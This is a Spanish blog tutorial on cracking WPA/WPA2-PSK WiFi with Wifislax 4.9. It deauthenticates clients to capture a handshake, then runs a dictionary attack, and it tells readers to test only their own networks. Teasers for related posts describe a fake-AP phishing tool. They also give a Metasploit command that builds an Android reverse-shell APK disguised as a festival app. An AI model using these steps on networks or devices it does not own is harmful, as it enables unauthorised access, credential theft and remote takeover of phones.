Ir al contenido principal

Wifislax 4.9 - I Conseguir acceso a redes WiFi protegidas con WPA/WPA2-PSK AirCrack



En esta practica se ha usado la ultima versión de Wifislax la 4.9  la podéis descargar AQUÍ , también han sido necesarios un pendrive para acceder al live CD y una Antena Alfa Network AWUS036H

Para los que empezáis de cero, necesitaremos una ISO de WIfislax  un dispositivo de almacenamiento USB y ganas de probar la seguridad de nuestra red WiFi...


 Comenzamos!  creamos desde un sistema Windows el live CD de Wifislax con Yumi. Ejecutamos Yumi y seleccionamos la distribución o sistema para hacerla booteable desde el pendrive, acto seguido selecionamos la ISO de Wifislax y le damos a crear, podemos escoger los parámetros, como formatear el pendrive antes de crear el arranque y demás. Para arrancar desde el un dispositivo de almacenamiento USB es necesario que nuestra placa base soporte el arranque desde USB, en mi caso con habilitarlo desde la bios y pulsar F12 en el arranque ya me permite bootear un sistema de almacenamiento USB,al arrancar el pendrive nos aparecerá el menú de yumi, nos da dos opciones , arrancar el disco duro principal o seleccionar otros sistemas y herramientas, escogemos la segunda opcion y pulsamos Enter en Wifislax 4.9, escogemos el kernel por defecto y el escritorio KDE.

Tras arrancar realizar las comprobaciones y ajustar el sistema a nuestro equipo cargara el escritorio por defecto de Wifislax, una vez terminado seguimos con el siguiente paso, Conectamos la Antena Wifi USB , en este caso la ya mencionada Alfa AWUS036 el propio sistema instalará el driver correspondiente y abajo en icono de red nos saldrán las redes wifi disponibles.


Ahora procedemos con la practica - Conseguir acceso a una red inalámbrica protegida con seguridad WPA-PSK


RECORDAR QUE ESTAS PRACTICAS SON PARA REALIZARLAS EN VUESTRAS PROPIAS REDES INALÁMBRICAS, PARA PROBAR LA SEGURIDAD DE LAS MISMAS


para acceder a airoscropt wifislax accederemos por la siguiente "ruta"


Inicio - Wifislax- Suite aircrack-ng - airoscript wifislax  


Una vez ejecutado el script nos deja seleccionar la interfaz que utilizaremos para el ataque, escogemos wlan0   , ahora nos pregunta si queremos activar el modo monitor, y tambien que driver queremos utilizar, con esta antena seleccionamos 1, SI y Compat Wireless pulsamos enter y nos mostrará el menu de airoscript.


     1) Escanear                      -Buscar Objetivos                 

     2) Seleccionar                  -Seleccionar Objetivo             
     3) Ataques                       -Atacar Objetivo                  
     4) Crackear                      -Menu Crackear                    
     5) Auto                              -Buscar Key Automaticamente       
     6) Autenticar                    -Cliente Falso en Objetivo        
     7) Desautenticar              -Desautenticar del Objetivo       
     8) Inyección                      -Menu de Inyección                
     9) Opciones Avanzadas   -Utilidades Varias                
   10) Salir                              -Cerrar Airoscript   

Seleccionamos escanear objetivos, y dentro de la opcion 1, escogemos la opción 6, escanear WPA-WPA2, después seleccionamos la opcion 1, Todos los canales y nos mostrará todas las redes disponibles con WPA/WPA2  - PSK




 Aquí, tenemos una imagen de las redes que hemos conseguido localizar, a continuación cerramos la ventana y nos devolverá al menú de airoscript y seleccionamos la opcion 2, Seleccionar Objetivo aquí escogeréis la red inalámbrica de la cual deseáis poder acceder. seleccionamos la red y después pulsamos "1" , seleccionar cliente, yo aqui utilicé la opción Nº3, des-autenticar todos los clientes del AP y re-detectar los clientes.


Aquí lo que realiza es una "expulsión" de todos los clientes obligandolos a re-conectarse a la red, en el proceso de autenticació se obtiene el Handshake, el handshake contiene la clave WPA del punto de acceso, ahora procederemos a desencriptar la clave.


Para poder desencriptar el handshake es necesario abrir otra herramienta disponible en wifislax, Wpa-Gui-Qt (Crack guiado de WPA)  para acceder a ella repetimos la búsqueda.



Inicio- Wifislax- WPA- Wpa-Gui-Qt

Ahora se abrirá el programa


Seleccionamos el diccionario con el que tenemos que probar las posibles contraseñas, por internet se pueden conseguir muy buenos diccionarios creados por pentesters en los que se incluyen millones de palabras y posibles contraseñas.


Y seleccionamos el handshake, que queda guardado en la siguiente ruta:



/root/swireless/airoscript/capturas/ 

y escogemos nuestra captura que sera algo parecido a



XX:XX:XX:XX:XX:XX-XX.cap

ahora solo toca esperar a que el aircrack de con la clave de la red WiFi





Espero que os haya sido de utilidad y recordar cualquier duda dejarla en comentarios !



Otras entradas de interés



Entradas populares de este blog

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset

Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET. LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente. 1. Escanea la red. 2. Selecciona la red. 3. Busca handshake (se puede usar sin handshake) 4. Se elige una de las varias interfaces web en diferentes idiomas 5. Se monta un AP Falso imitando al original 6. Se crea un servidor DHCP sobre el AP Falso 7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante) 8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4) 9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir 10. Se desautentifica a todos los usarios de la red, esperando que se conec...

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET

Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android. El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android). Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload. Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nu...